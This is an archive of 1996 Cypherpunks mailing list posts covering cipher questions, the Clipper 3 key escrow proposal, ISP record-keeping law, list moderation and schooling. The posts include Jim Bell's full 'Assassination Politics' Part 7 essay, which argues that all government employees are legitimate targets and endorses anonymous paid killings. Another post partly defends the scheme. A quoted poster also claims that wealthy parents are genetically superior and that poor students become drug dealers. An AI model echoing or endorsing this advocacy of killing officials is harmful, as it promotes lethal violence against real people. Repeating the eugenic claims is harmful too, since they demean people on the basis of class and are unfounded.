> and killing children, but was told to do nothing, and I obeyed."? Any statement that is consistent with developments in this case, and other similar cases, most likely. > There is a tendency of many on this list to demonize those we > disagree with. If a person or group takes the 'wrong' stance on > cryptography, key "escrow", etc, many list members will act as > if that person or group were capable of any atrocity, and is acting > out of the very worst of motives and hidden agendas. > Such an attitude is common, but not desirable in the modern world. > It served some purpose when war involved the literal massacre of > one's opponents - it's easier to commit genocide against the tribe > over the ridge if you demonize them into not-quite-humans, but in > the modern world this is not a rational option. You should know that "many on this list" bears no relation to the LEA's mentioned above. People on this list have relatively small agendas, in money terms, whereas the LEA's are servicing people with Big Money. > While it's possible to regard many policies of governments, > ill-informed, self-serving, populist, and wrong, to act as if there is > no significant differences between real democracies and the worst > authoritarian dictatorships is absurd. Please list any "real democracies". Thanks a bunch. From stewarts at ix.netcom.com Wed Sep 25 01:21:58 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 25 Sep 1996 16:21:58 +0800 Subject: WARNING: This Message Actually Contains a Question Reguarding Crypto! Message-ID: <199609250610.XAA23137@dfw-ix12.ix.netcom.com> At 11:34 AM 9/24/96 -0500, "William H. Geiger III" wrote: >I just recently downloaded copies of Blowfish & Ghost. Do you mean GOST, the Russian algorithm family? >Does anyone have any experiance with these two algorithims? >How do they comare to RSA, DES, 3DES, IDEA ? Bruce Schneier's book Applied Cryptography discusses Blowfish (no surprise, since it's his algorithm) and I think also discusses GOST. Blowfish is very fast once you've finished the (deliberately slow) key schedule. It appears to be tolerably strong, though there hasn't been as much analysis on it as on RC4 or IDEA yet, much less DES. GOST requires you to set some parameters, I think S-boxes, and the strength of the algorithm depends on lots of subtle effects of those parameters. The set used by the Russian military is classified; some of the other sets are public, and presumably the implementation you have gets its values from someone. Unless you know who, and how strong they are, I wouldn't trust it. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From stewarts at ix.netcom.com Wed Sep 25 01:27:35 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 25 Sep 1996 16:27:35 +0800 Subject: Bork book Message-ID: <199609250609.XAA23128@dfw-ix12.ix.netcom.com> At 11:28 AM 9/24/96 -0400, "Marc J. Wohler" wrote: >Heard him on Limbaugh pushing hard for censorship as a cure for society's >problems. Looks like Ted Kennedy & Co. were right to keep him off the court. Bork's comment a few years ago about the Ninth Amendment being an ink-blot on the Constitution was one of those Rorschach things you can interpret either way, but given that he clearly doesn't believe in the First Amendment, I'd guess he wouldn't have helped the 9th or the other rights-protecting amendments either. I didn't catch Bork directly, but I heard Limbaugh talking about it the day before and about half an hour after, so I caught some flavor of it. It was interesting hearing Limbaugh's mixed feelings about it; he seems to clearly _approve_ of censoring people that offend him, like 2 Live Crew, but also realizes that people would want to censor _him_. I'm guessing that the schtick he did on Pee-Wee Herman (with background music by Michael Jackson) a few minutes before saying he'd be interviewing Bork on Friday was coincidence, rather than something he'd done to set the tone of a discussion of censorship, but maybe not. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From jimbell at pacifier.com Wed Sep 25 01:31:43 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 25 Sep 1996 16:31:43 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] Message-ID: <199609242325.QAA10957@mail.pacifier.com> At 03:19 PM 9/24/96 -0400, Simon Spero wrote: >On Tue, 24 Sep 1996, attila wrote: > >> >> go back to your beloved England and your labour unions > your roots are showing :-) ----^ > >> NO, I will not outright reject Jim Bell's "Assassination >> Politics." > >Assasination politics is impossible to defend from a classical >Liberal/Libertarian position. Bell advocates arbitrary applications of >violence and coercion without restriction. There is no way to justify the >initiation of force without abandoning any pretence of being a >Libertarian (which, to be fair, Bell doesn't claim to be). You're wrong on at least three counts: I absolutely do claim to be a libertarian, for one. Secondly, while I advocate a system which I call AP, I do not "advocate" the MISUSE of that system for the act of attacking people who have no initiated force or fraud. On the other hand, to be intellectually honest I can't exclude the possibility that this will happen, any more than a libertarian who advocates a free society deny that somebody might abuse the freedoms of that society by initiating force. There is no contradiction here, except in the mind of a person who believes that people can't be given any freedoms it is possible for them to misuse. It's clear you haven't read AP part 7. Here it is; maybe you'll learn something from it. 1. I defend AP from a classical liberal/libertarian position. 2. I don't advocate arbitrary applications of violence and coercion without restriction. 3. I only _advocate_ responding to force/fraud with force. "Assassination Politics" Part 7, by Jim Bell Dear libertarian Friend, I very much understand the concerns you voiced about my idea which I call, "Assassination Politics," because this essay is nothing if it is not radical and extreme. I wrote it, in the middle of last year, partly because I think libertarianism and libertarians in particular need to address what is, if not a "contradiction," is at least an intolerable reality: On the one hand, we are told not to initiate agression, but on the other we are agressed against by the government every time it collects a tax. I much appreciate the way some people I know have "dropped out" of the system, and the guts that such a tactic requires. But that's the problem, I think: Only those with the "guts" do it, which gives the government fewer targets so that it can spend more time attacking the few who oppose it. The reality is that the government STILL collects taxes, and it STILL uses that money to violate our rights. We all know that's wrong. My position is quite simple: If tax collection constitutes agression, then anyone doing it or assisting in the effort or benefitting from the proceeds thereof is a criminal. This is quite analogous to current law which prosecutes co-conspirators. While I am not holding out "current law" as some sort of gold-standard of reasonableness that we must always accept, on the other hand I think it's plausible to use it to show that once we have come to the conclusion that taxation is theft, the prescription follows directly by a form of reasoning allegedly acceptable to society: It is reasonable to "attack the attackers" and their co-conspirators, and everyone who is employed by the government is thus a co-conspirator, even if he is not directly involved in the collection of those taxes. That's because he IS involved in _benefitting_ from the proceeds of these taxes, and he presumably provides a certain level of "backup" to the young thugs that governmental organizations often hire. I realize, and you should too, that the "non-agression principle" says nothing about the EXTENT of the self-defense/retaliation that one might reasonably employ in defending one's own rights: In a sense, that sounds like an omission because it at least suggests that a person might "unreasonably" defend himself with lethal force when far less drastic means might normally be called for. For what it's worth, I think most people will behave responsibly. But I think it is pretty straightforward to argue that whatever means are necessary to stop the attack, are reasonable given the terms of the non-agression principle: If a given means are known to be inadequate to actually stop the attack, then further and more serious means are reasonable and called-for. To set up a reasonable analogy, if I'm walking down the canonical "dark alley" and am accosted by a man wielding a knife threatening me with it, it is presumably reasonable for me to pull a gun and threaten back, or possibly take the encounter to the final conclusion of gunfire. Even if I should choose to hold my fire and test to determine whether my actions deterred him, I can't see that this possibility binds me morally. And should he advance, despite the gun, as if to attack, I should feel no remorse in shooting him and taking myself out of danger. If you accept the premises so far, you apparently accept the principle that escalation of the self-defense/retaliation is reasonable as long as if the current level of returned counter-threat is inadequate to stop the agression initiated by the other party. To believe otherwise is to believe that ultimately, you are obligated to accept a certain high level of agression simply because you do not have the resources (yet) to resist it. I totally reject this concept, as I hope you would. So if, hypothetically, I could have an anonymous conversation with a hard-nosed government employee, and asked him, "If I killed one of your agents, would you stop trying to collect that tax from me," his predictable reaction would be, "no, we would continue to try to collect that tax." In fact, he would probably hasten to add that he would try to have me prosecuted for murder, as well! If I were to ask if killing ten agents would stop them, again they would presumably say that this would not change their actions. The conclusion is, to me, obvious: Clearly, there is no practical limit to the amount of self-defense that I would need to protect my assets from the government tax collector, and to actually stop the theft, so I suggest that logic requires that I be morally and ethically allowed (under libertarian principles) to use whatever level of self-defense I choose. You raised another objection, that quite frankly I believe is invalid. I believe you implied that until a specific level of escalation is reached ( such as the Feds showing up on your doorstep, etc) then it is not legitimate to defend oneself. Delicately, I must disagree. As we all well know, government ultimately operates primarily not on actual, applied force, but simply the threat of future force if you do not comply. True, there are people who have decided to call the government's bluff and simply drop out, but the reality is that this is not practical for most individuals today. This is no accident: The government makes it difficult to drop out, because they extort the cooperation of banks and potential employers and others with which you would otherwise be able to freely contract. In any case, I fail to see how not "dropping out" makes one somehow morally obligated to pay a tax (or tolerate the collection of one). I trust you did not inadvertently mean to suggest this. The reason, morally, we are entitled to shoot the mugger if he waves the knife in our face is that he has threatened us with harm, in this case to our lives, but the threat the government represents to the average citizen (loss of one's entire assets) is just as real, albeit somewhat different. Since government is a past reality, and a present reality, and has the immediate prospects of being a future reality as well, I sincerely believe that the average citizen can legitimately consider himself CONTINUOUSLY threatened. The agression has already occurred, in continuously occurring, and has every prospect of continuing to occur. If anything would justify fighting back, this would. To continue the analogy, if you've been repeatedly mugged by the same guy down the same dark alley for each day of last month, that DOES NOT mean that you've somehow consented to the situation, or that your rights to your assets have somehow been waived. With my "Assassination Politics" essay, I simply proposed tht we (as libertarians as well as being ordinary citizens) begin to treat agression by government as being essentially equivalent to agression by muggers, rapists, robbers, and murderers, and view their acts as a continuing series of agressions. Seen this way, it should not be necessary to wait for their NEXT agression; they will have always have been agressing and they will always BE agressing, again and again, until they are stopped for good. At that point, the question shifted to one of practicality: Sure, theoretically we might morally have the "right" to protect ourselves with lethal force, but if they have any reputation at all, government agents have a habit of showing up in large numbers when they actually apply direct force. To take a position that you can only defend yourself when _they've_ chosen the "where" and "when" of the confrontration is downright suicidal, and I hope you understand that I would consider any such restriction to be highly unfair and totally impractical. Understand, too, that the reason we're still stuck under the thumb of the government is that to the extent it's true, "we've" been playing by THEIR rules, not by our own. By our own rules, THEY are the agressors and we should be able to treat them accordingly, on our own terms, at our own convenience, whenever we choose, especially when we feel the odds are on our side. I understand, obviously, that the "no initiation of agression" principle is still valid, but please recognize that I simply don't consider it to be a valid counter-argument to "Assassination Politics," at least as applied to targets who happen to be government agents. They've "pre-agressed," and I don't see any limit to the defenses I should be able to muster to stop that agression completely and permanently. Not that I don't see a difference between different levels of guilt: I fully recognize that some of them are far worse than others, and I would certainly not treat a lowly Forest Service grunt in the same fashion as an ATF sniper. Now, there is one more thing that I would hope we could get straight: As I originally "invented" this system, it occurred to me that there could be certain arguments that it needed to be "regulated" somehow; "unworthy" targets shouldn't be killed, etc. The "problem" is, what I've "invented" may (as I now believe it to be) actually a "discovery," in a sense: I now believe this kind of system was always inevitable, merely waiting for the triad of the Internet, digital cash, and good encryption in order to provide the technical underpinnings for the entire system. If that is genuinely the case, then there is no real way to control it, except by free-market principles. It would be impossible, for example, to set up some sort of "Assassination Politics Dictator," who decides who will live and who will die, because competition in the system will always rise to supply every demand, albeit at possibly a very high price. And if you believe the maxim that "absolute power corrupts absolutely," you wouldn't want to accept any form of centralized control (even, perhaps, that of your own!), because any such control would eventually be corrupted. Most rational people recognize this, and I do too. I would not have invented a system where "Jim Bell" gets to make "all the decisions." Quite the contrary, the system I've described absolutely prevents such centralization. That, quite frankly, is the novelty and dare I say it, the beauty of this idea. I believe that it simply cannot be hijacked by centralized political control. As I pointed out in the essay, if _I_ were running one of the organizations accepting those donations and offering those prizes, I would selectively list only those targets who I am genuinely satisfied are guilty of the violation of the "non-agression principle." But as a practical matter, there is no way that I could stop a DIFFERENT organization from being set up and operating under DIFFERENT moral and ethical principles, especially if it operated anonymously, as I antipate the "Assassination Politics"-type systems will be. Thus, I'm forced to accept the reality that I can't dictate a "strongly limited" system that would "guarantee" no "unjustified" deaths: I can merely control my little piece of the earth and not assist in the abuse of others. I genuinely believe, however, that the operation of this system would be a vast improvement over the status quo. This, I argue, is somewhat analogous to an argument that we should be entitled to own firearms, despite the fact that SOME people will use them wrongly/immorally/illegally. The ownership is a right even though it may ultimately allow or enable an abuse that you consider wrong and punishable. I consider the truth of such an argument to be obvious and correct, and I know you would too. I realize that this lacks the crisp certitude of safety which would be reassuring to the average, "pre-libertarian" individual. But you are not the "average individual" and I trust that as long-time libertarians you will recognize rights must exist even given the hypothetical possibility that somebody may eventually abuse them. I do not know whether I "invented" or "discovered" this system; perhaps it's a little of both. I do genuinely believe that this system, or one like it, is as close to being technologically inevitable as was the invention of firearms once the material we now know as "gunpowder" was invented. I think it's on the way, regardless of what we do to stop it. Perhaps more than anyone else on the face of this planet, this notion has filled me, sequentially and then simultaneously, with awe, astonishment, joy, terror, and finally, relief. Awe, that a system could be produced by a handful of people that would rid the world of the scourge of war, nuclear weapons, governments, and taxes. Astonishment, at my realization that once started, it would cover the entire globe inexorably, erasing dictatorships both fascistic and communistic, monarchies, and even so-called "democracies," which as a general rule today are really just the facade of government by the special interests. Joy, that it would eliminate all war, and force the dismantling not only of all nuclear weapons, but also all militaries, making them not merely redundant but also considered universally dangerous, leaving their "owners" no choice but to dismantle them, and in fact no reason to KEEP them! Terror, too, because this system may just change almost EVERYTHING how we think about our current society, and even more for myself personally, the knowledge that there may some day be a large body of wealthy people who are thrown off their current positions of control of the world's governments, and the very-real possibility that they may look for a "villain" to blame for their downfall. They will find one, in me, and at that time they will have the money and (thanks to me, at least partially) the means to see their revenge. But I would not have published this essay if I had been unwilling to accept the risk. Finally, relief. Maybe I'm a bit premature to say it, but I'm satisfied we _will_ be free. I'm convinced there is no alternative. It may feel like a roller-coaster ride on the way there, but as of today I think our destination is certain. Please understand, we _will_ be free. Your libertarian friend, Jim Bell Jim Bell jimbell at pacifier.com From gbroiles at netbox.com Wed Sep 25 01:34:25 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Wed, 25 Sep 1996 16:34:25 +0800 Subject: Clipper 3 spec release imminent Message-ID: <3.0b19.32.19960924225206.006eb8e0@ricochet.net> According to a story posted to C|net tonight, the Clinton administration will likely release the third Clipper/GAK proposal soon. The article (available at http://www.news.com/News/Item/0,4,3791,00.html ) indicates: "What the proposal specifies is still a matter of speculation, but an article today in the Daily Report for Executives quotes unnamed U.S. officials saying the plan will raise the ceiling on encryption export controls, institute a key-escrow system, and give the Commerce Department authority to grant export licenses. If the report is correct, the two big surprises are a new 56-bit limit key length, with export of anything higher subject to key escrow, and the authorizing of the Justice Department--most likely the Federal Bureau of Investigation--to reject any applications for export licenses." There's a sidebar to the story with several other crypto-related stories, mentioning ProCODE and last Friday's hearing in the Bernstein case. -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From aba at dcs.ex.ac.uk Wed Sep 25 01:40:39 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Wed, 25 Sep 1996 16:40:39 +0800 Subject: Banning annoying users In-Reply-To: <199609241158.HAA27269@envirolink.org> Message-ID: <199609241609.RAA00235@server.test.net> > The not allowing unsubscribed individuals to post is logical, for a > time. This isn't practical for the reason that many people who read and post to the list are not subscribed to the list. (There are many gateways, local mail->news gateways, etc. eg point your nntp aware news reader at nntp.hks.net.) Either delete the junk, or subscribe to a filtered list if deleting or not reading posts bothers you enough that you think it worth the risk that the filter owner filters a few posts that you would have found interesting. (killfiling on address is not possible for remailer, and content of unattributed unsigned anonymous posts is difficult to automatically filter). Adam From eyethink at cse.ucsc.edu Wed Sep 25 01:42:47 1996 From: eyethink at cse.ucsc.edu (Carl A. Wescott) Date: Wed, 25 Sep 1996 16:42:47 +0800 Subject: wanted: cryptographers and security consultants Message-ID: <199609250408.VAA16237@arapaho.cse.ucsc.edu> WANTED: CRYPTOGRAPHERS AND SECURITY EXPERTS ------------------------------------------- I am consulting at a technology company which is supplying electronic commerce solutions. We need security experts, hackers/crackers, & programmers, to help in performing blackbox and clearbox penetration testing of the systems/server and the front-end client/product. We also seek collaborators who can help us with security policy review and programmers who can help us implement our visions. Interested parties please contact me via email or at 415 380 8100. Thanks, --C; From Adamsc at io-online.com Wed Sep 25 01:42:47 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 25 Sep 1996 16:42:47 +0800 Subject: Public Schools Message-ID: <19960925051617328.AAA184@IO-ONLINE.COM> On Sun, 22 Sep 1996 15:40:32 -0700, Timothy C. May wrote: >>> thru about the 3rd or 4th grade, and I do agree that most of todays schools >>> are shit, however there is one area--social skills--that homeschooling >>> simply can't compete. Children need to learn how to interact with one another >>in a certain area get together. Homeschooling does not have to stand in >>the way of a normal socialization process. >Also--and I mean this point completely seriously!--many parents are not >altogether convinced that the "public school socialization" is all that >beneficial. Do kids really _need_ to learn to wear gang colors, smoke to be >cool, get pregnant at age 14, and so on? >I think the "social skills" Snow talks about above are actually the _worst_ >part of public schools in fin-de-Siecle America. If I had a kid, I wouldn't >want him or her in the local public schools. I'd have to disagree with you on this. Based on my experience in 3 widely different districts, such behaviour/problems isn't likely to result from the school environment. It's a function of the family life these kids have. If they come from a disfunctional family, kids are going to join gangs, get pregnant , use drugs, etc no matter what school they're at. If they have the right background, it's not going to happen. Of course, in some areas (esp. inner cities) the rate of social dysfunction is extremely high, so some schools are 90% 'problem-kids' as well. I'd reccommend against having a homeschooled kid go to one of those (unless you've been using the Cypherpunks Homeschool Plan For the Instruction of the 3 Rs, Martial Arts, Bomb-Making, Assasination and Black-Helicopter Countermeasures. I imagine school would be very popular if some list members were teaching) just because it would significantly reduce the opportunity for them to catch a stray bullet or something. I still doubt that a homeschooled kid from a strong family would join these groups. From aba at dcs.ex.ac.uk Wed Sep 25 01:47:45 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Wed, 25 Sep 1996 16:47:45 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: <199609241328.JAA12601@sherry.ny.ubs.com> Message-ID: <199609241621.RAA00240@server.test.net> Paul writes: > i was under the impression that germany's goal was to stop the distribution > of radikal 154 by xs4all, not by 50 mirror sites. they seem to have > accomplished their goal. do you really think that they will let a little > thing like reason stand in their way when claiming victory? They lost: it is still available. If they went after another mirror the number of mirrors would double :-) Someone in the German press needs to rub their noses in the fact that they lost, say by printing a list of URLS, or just mentioning the number of mirrors, and the different countries they are located in. The need to translate the quote: `The internet sees censorship as damage, and routes around it' and put that in big letters. Any German net freelance journalists reading? Adam -- #!/bin/perl -sp0777i I don't know if anyone else has seen this, but I was mailing letters in the "out front" boxes the other day when I noticed a sign. The sign said that all packages 16 ounces or over had to be taken inside for disposal into the mail slot. The obvious explanation being that even though you can abstain from marking a return address, the postal inspectors would like a nice photo of you with your mail. Greg Kucharo sophi at best.com "If you want facts, buy an almanac" -The Daily Iowan From erp at digiforest.com Wed Sep 25 02:09:24 1996 From: erp at digiforest.com (Jay Gairson) Date: Wed, 25 Sep 1996 17:09:24 +0800 Subject: Public Schools In-Reply-To: <20uRuD1w165w@bwalk.dm.com> Message-ID: First off, what does this have to do with cryptography? or anything cypher for that matter? On Tue, 24 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > Phil Fraering writes: > > > On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > > > > > > > U.S. public school system is darwinian evolution in action. Parents who can > > > afford to send their kids to private schools, do so. Parents who send their > > > kids to public schools deserve to have their offsprings fucked up, mentally > > > and phsyically, to improve the species' gene pool. So, basically your saying, since my parents cannot afford to pay for a private school for me, we are genetically inferior to those who can? Because hate tell ya, but I've ran into some major idiots that go to private schools. Also to consider that from the school I go to, last year we had two perfect sat scores (no problems missed). > > > > But the cutoff is often whether the parents can afford to send their kids > > to private school, not whether or not they're genetically superior. > > You must have attended a public school if you don't understand that geentic > superiority leads to economic success. My older kid goes to a private school. > The parents are obviously genetically superior to public school parents. I am assuming from what you have said in that statement, that you believe since he may have gone to a public school, it has made him have the opinion he does? Also, in your statement that your older kid goes to a private school, and that the parents are obviously genetically superior to public school parents. You seem to be saying that YOU are genetically superior to my parents? Another thing to consider here is, from this line of statements, you are saying that children who have parents who made it well in, let us say the movie buisness (or even drug buisness), and then send there children to public schools, are genetically superior because they can act (lie) better than my parents. For if this is so, that must mean that my aunt is genetically superior to my mother (who is a teacher at a private school, but she did not go to a private school) and to her parents, for she is making more money, and if she ever has children they will be genetically superior to me, because they will have more money? Just wanting this cleared up please.. It kind of confuses poor little 'ol me who is jsut a lousy senior in a public school (and scored 1560 on my SAT, as if that means anything, just means I have a good memory), since from what you say I must be stupid, because my parents only make 50 to 60k$ per year between the two of them (My father being an AutoCad Design Consultant, and my Mother a LD (Learning disabled) Teacher at a public school)? > > > And the reason it costs so much to send a kid to private school is that > > everyone's already paying for a more expensive public school thanks to all > > the taxes. True, but also depends on where you are at. Some states have cheaper taxes (Nevada for instance), compared to others. > > Push vouchers. What's the cryptorelevance of your comments, anyway? > Umm, where you not the one that started this conversation? > > > There are plenty of excellent private elementary and secondary schools in t > > > U.S. Children who deserve better schooling (by virtue of having parents who > > > have better genes and are therefore economically successful) get it. > > > > So if I'm economically successful it'll change my genes? > > > > I guess this is the famous Russian belief in Lamarkianism in action. >From the sounds of what he said, Lamark was 100 Percent correct, and Darwin and (that other guy, name just slipped my mind, must be those genetically inferior genes of mine)? > No, on the contrary, sending poor kids to good schools on scholarships > does not improve their genes. They tend to become drug dealers. Hate to inform you on this but, it is more often than not the children sent by there rich mama and papa to school, that end up on drugs or as drug dealers, than the ones that start out with scholarships (For the ones with scholarships have more to loose, than the ones with the rich mama and papa, for the rich mama and papa can afford the big expensive lawyer.). Just look at the studies and such done on this type of area. Also you have to consider that generally the ones that end up as drug dealers, are the children who have parents that where drug dealers and such or had experience in such, or just had parents who didn't care what they did. Ok, now back to something crypto related ok? Though I am rather interested in this subject. Boy oh boy, someone has a opssibly inferiority complex here... From Adamsc at io-online.com Wed Sep 25 02:09:43 1996 From: Adamsc at io-online.com (Adamsc) Date: Wed, 25 Sep 1996 17:09:43 +0800 Subject: Taking crypto out of the U.S. Message-ID: <19960925060114140.AAA186@IO-ONLINE.COM> On Tue, 24 Sep 1996 07:01:51 -0700, Dale Thorn wrote: >> Soon I am going to be going overseas to Japan, and I want to take >> my notebook with me so I can keep up with everything, however, I have >> encrypted my hard drive and usually encrypt my mail. Is this in >> violation of the ITAR to keep everything the same when I go over? >Bad enough now that many places require you to put your laptop computer >through the big gray x-ray machine (no exceptions in some places, >especially federal buildings in the U.S.), but if they start requiring >you to list individual files (?????). Very high potential for abuse here! Under HPFS (OS/2's file system) each file takes a minimum of 512 bytes. On your average $200 2GB drive, that'd be around 4194304 files. I wonder if they have that much printer paper? (Particularly to handle those fully qualified filenames...) Now, if you were some sort of evil-cypherpunk-hacker, you might have a hacked copy of Linux that has some really "creative" file systems (The fractal file system - 5 trillion files and counting) and puts that to shame. Even better, have something equivelent to a source-code shrouder that would go through and create a bunch of random looking file names (Was PGP 0e3ahjw2.exe or 052a6v62.obj?) In other words, I have a feeling this would fly about as far as a V-22. From attila at primenet.com Wed Sep 25 02:32:37 1996 From: attila at primenet.com (attila) Date: Wed, 25 Sep 1996 17:32:37 +0800 Subject: The Iron Lady almost on target Message-ID: <199609250528.XAA03556@InfoWest.COM> The Iron Lady launched into an attack against government regulations, political correctness, and a licentious socity. Let's run her for President. she couldn't be any worse than Bubba or Dolt --and she might terrorize half or more Washington. ------ Forwarded ------ London Daily Telegraph for 25 Sep 95 Thatcher hits out at moral 'corrosion' [Anonymized]

LADY Thatcher spoke out against the "licentiousness" of the permissive society last night and said that children were being brought up in a morally corrosive atmosphere.

The former Prime Minister expressed her distaste for the coarsening of popular culture in a lecture in London which praised the enduring values and institutions of American civilisation. On the day in which the annual crime figures showed the first overall increase in Britain for several years, she also lamented the steady decline in law and order which had rendered everyone "less secure than we of a right should be".

She said: "From the most heinous acts of terrorism to the petty burglar and street corner mugger, we are confronted by those for whom words such as 'justice' and 'right' have no meaning. We see around ourselves the licentiousness of modern society manifested in popular culture. We have witnessed a coarsening of everything from art to music to literature and film. But for some people there seems to be nothing beyond the pale, for them freedom has no limits."

Lady Thatcher did not specify the targets of her criticism, but went on to accuse those who advocated unrestrained freedom of expression as perverse, demeaning and dangerous. She said: "The younger generation is being reared in a morally corrosive atmosphere where they are taught that in the name of liberty, anything goes. There is no elevation of the human spirit in works designed merely to shock or to appeal only to our most base instincts."

Lady Thatcher's vigorous defence of the rule of law reprised a familiar theme from her period of office in Downing Street, when the Conservatives were themselves accused of fuelling the rise in lawlessness by putting too great an emphasis on individualism.

However she did not refer to the present Government and its internal difficulties at all, except to warn in passing of what she saw as the dangers posed by the Labour Party or bureaucrats in Brussels. She said: "If we should be enticed once more down the rutted and muddy road of socialism, we will again find Britain mired in a morass of stifling regulations and government controls."

In a sustained attack on state-enforced egalitarianism, Lady Thatcher also hit out at the fashion for political correctness as "the guiding sentiment of tyrants in every age" who believed that if they controlled what people read, they controlled the people themselves.

Delivering the inaugural James Bryce lecture for London University's Institute of United States Studies, Lady Thatcher called for more serious study of the history and culture of America to understand the exceptional role the US had played in world affairs. It had served as a beacon of enlightenment in the struggles against German imperialism, fascist aggression and communist tyranny during this century, and would dominate the next.

She said: "We are confronted by a stream of dictators and tyrants who will seek to dominate those nations around them, if not the entire world. The deepest conflicts between men will not subside, nor can they subside until the basic principles of individual liberty and political freedom are embraced throughout the world."

Lady Thatcher said that too much talk of "rights" was in danger of overwhelming the importance of duty and responsibility in a free country. She said: "In the process, liberty decays into licence in an atmosphere where all is permitted and nothing prohibited. The resulting permissive society is in fact no society at all. It is little more than a state of nature where the line between right and wrong is first blurred and then obliterated - a place where no one dares to say no. There can be no order without authority, and authority that is impotent or hesitant in the face of intimidation, crime and violence, cannot endure."

She challenged the modern assumption that progress was the general rule and corruption the exception. Often, it was the other way around. "Freedom and civilisation are conditions that require great effort, deep thought, and unwavering commitment," she said.

From dthorn at gte.net Wed Sep 25 02:48:13 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 17:48:13 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] In-Reply-To: Message-ID: <3248DE04.5363@gte.net> Simon Spero wrote: > On Tue, 24 Sep 1996, attila wrote: > > NO, I will not outright reject Jim Bell's "Assassination Politics." > Assasination politics is impossible to defend from a classical > Liberal/Libertarian position. Bell advocates arbitrary applications of > violence and coercion without restriction. There is no way to justify > the initiation of force without abandoning any pretence of being a > Libertarian (which, to be fair, Bell doesn't claim to be). I understood the intent of AP was to take powers the government is already exercising (unconstitutionally), and merely transfer some of them to the people, as it were. Isn't this true democracy (if a rather perverse kind)? Maybe you should consider that, in the final analysis, Mr. Bell may not so much want all of us to have responsibility for killing as he does want to remove the govt's "arbitrary applications of violence and coercion without restriction", and AP is just your wake-up call. Maybe, instead of having to face the (alleged) horror of AP, you could join with other like-minded citizens and stop these atrocities from the top down, if you have the nerve to go toe-to-toe with "the real killers", government-style. From geeman at best.com Wed Sep 25 03:00:04 1996 From: geeman at best.com (geeman) Date: Wed, 25 Sep 1996 18:00:04 +0800 Subject: [Fwd: Int'l Crypto Resolution Released in Paris] Message-ID: <3248CF35.6A54@best.com> An embedded message was scrubbed... From: unknown sender Subject: no subject Date: no date Size: 3550 URL: From paul.elliott at Hrnowl.LoneStar.ORG Wed Sep 25 03:09:37 1996 From: paul.elliott at Hrnowl.LoneStar.ORG (Paul Elliott) Date: Wed, 25 Sep 1996 18:09:37 +0800 Subject: ISPs' information on users In-Reply-To: Message-ID: <3248cca9.flight@flight.hrnowl.lonestar.org> > > On a more serious note, perhaps legal experts here could comment on > something I've been wondering about. Could ISPs in the UlS. be compelled to > report on the browsing and net surfing habits of their customer base? > > To make this clear, I don't mean in a specific criminal case, where the > records are searchable under a warrant. I mean a blanket order that all > ISPs compile and forward records. Lets get some of the cypherpunk legal types to comment on the following idea which is probably completely wrong: It is probably illegal for the ISP to keep such records in the first place! When I open a link to a remote WEB page or use FTP to retrieve a remote file, the software on my computer first forms a network connection between a program on my local computer and a remote "server" program at the remote site. The ISP provides hardware and software "in the middle" that allows this connection to take place. After this connection is established, the connection itself is used to negotiate the precise data I want (i.e. the filename in the case of FTP or the non-site portion of the URL in the case of the WEB). In order for the ISP to keep records of my browsing, it would have to snoop on this connection. But the connection is an electronic communication within the meaning of the Electronic communications privacy act (ECPA). Thus it is not legal for the ISP to keep such information. Thus the ISP can not report on the browsing habits and net surfing habits of its user base by complying with the law and never keeping the records in the first place. Perhaps the above does not apply to the site name of the connections. OK, cypherpunk legal types, tell me if I got the above wrong? -- Paul Elliott Telephone: 1-713-781-4543 Paul.Elliott at hrnowl.lonestar.org Address: 3987 South Gessner #224 Houston Texas 77063 From dthorn at gte.net Wed Sep 25 03:13:08 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 18:13:08 +0800 Subject: The Nature of the Cypherpunks List In-Reply-To: <199609241913.PAA19989@jekyll.piermont.com> Message-ID: <3248D7E9.C0A@gte.net> Re: below whimpering/whining/sniveling. Why don't you guys learn to use your computers? People who write this stuff must be thinking something like: "Gee, that cypherpunks list has SO much good info on it, I can't stand to not keep track of what's going on there. But those occasional irritating posts just upset me so much, I can't deal with it, so I better get it off of my chest and tell everyone. Oh, I feel so much better now, maybe they'll let me go home today." Perry E. Metzger wrote: > Timothy C. May writes: > > While some folks would rather we talked only about "crypto," just > > how many times can basic questions about Diffie-Hellman, or RSA, or > > elliptic curves be discussed? > I think a better question is "do we need to have to make sure people > are posting for the sake of posting? Why must we have a charter broad > enough to generate too much volume to allow conversation?" > Sure, there is a limit to what can be said about cryptography and the > direct politics of cryptography. *THAT IS THE POINT*. That is why I'm > starting a new list -- so that I can abandon this waste heap to those > that like frolicking in the mire. > > And as I was there at the initial planning meeting in July of '92, > > and then at the first physical meeting, I can assure you that what > > soon became "Cypherpunks" was never intended to be an announcement > > list for research discoveries in mathematical cryptography! > No. It was intended for discussion of cryptography *and* the politics > of cryptography. Not theories about some airliner was shot down by > aliens, not random musings on "assasination politics". The idea was > never to be restricted just to the technical aspects of cryptography, > but the notion was to have a place where the non-technical discussion > also was on *cryptography*. This list no longer has *any* charter. A > posting on sexual practices in Botswana is probably as "on topic" as > anything else these days. > The new list, however, will have a charter, and it *will* be enforced. > > Much as some have been shrilly claiming "This list is for crypto and > > programming discussions only," this was *never* the intent. > Tim, I hate to say this, but cypherpunks is a sewer which has driven > off anyone seriously interested in the area, and you are part of the > reason. > > The serious crypto researchers, e.g., the Matt Blazes, the Whit > > Diffies, and the Carl Ellisons of the world, have various channels > > they use to communicate in. > For those who can think back a few years, this *used* to be one of > those fora. No 